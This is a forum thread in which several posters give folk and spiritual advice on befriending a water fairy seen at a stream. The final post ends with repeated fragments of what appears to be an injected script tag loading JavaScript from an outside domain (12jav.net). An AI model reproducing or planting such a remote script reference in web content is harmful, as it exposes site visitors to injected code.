I would just meditate by the bank, see how she gets used to you being there. At the very least, pay attention to any ideas coming into your head that don't "feel" like yours, emotions shifting within you-- or beaming from the water fairy, if you can keep her in sight, that might be easier...
If the message you get is "dunk yourself completely in the water, right now, and don't come back out" um... you probably shouldn't do that.
I don't believe they maliciously try to drown you, more likely they just can't understand... that they might not need the other elements, like air, to survive-- but we do.
Otherwise, since you seem to have such enthusiasm for the path of water, I think you won't run out of topics in common.
Some books I've read make a big deal about Libation -- offerings of milk or wine, or making special ceremonial fairy-cakes -- and to befriend the fey-folk is very ritualized...
I personally do away with that (because what if the milk is polluting, or the wine kills the plankton? and can't we just talk , I mean nobody throws a debut for every friend they make in the human world...) and guess I'm still alive to advise: trust your intuition, remember you're a guest-- but be yourself.

leave an offering of some kind, get on the astral level and try to find and or speak to it there. then do the same in the physical realm, it might just befriend you who knows.
LOL...kewl...befriending a fairy...=D...do u play any instrument??...if so I heard they love music...or u can just hang out in the stream alot and eat some foods maybe she'll get hungry and join u...LOL....though be careful with fairies they say that sometimes fairies can be totally dangerous....errr..in their own little ways.....

the fairy folk love fresh fruit and sweet things. also look around at the place you saw her/him and see if you can do something for her/him, eg.if it's a female try leaving a ring of flowers. was it female or male? sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
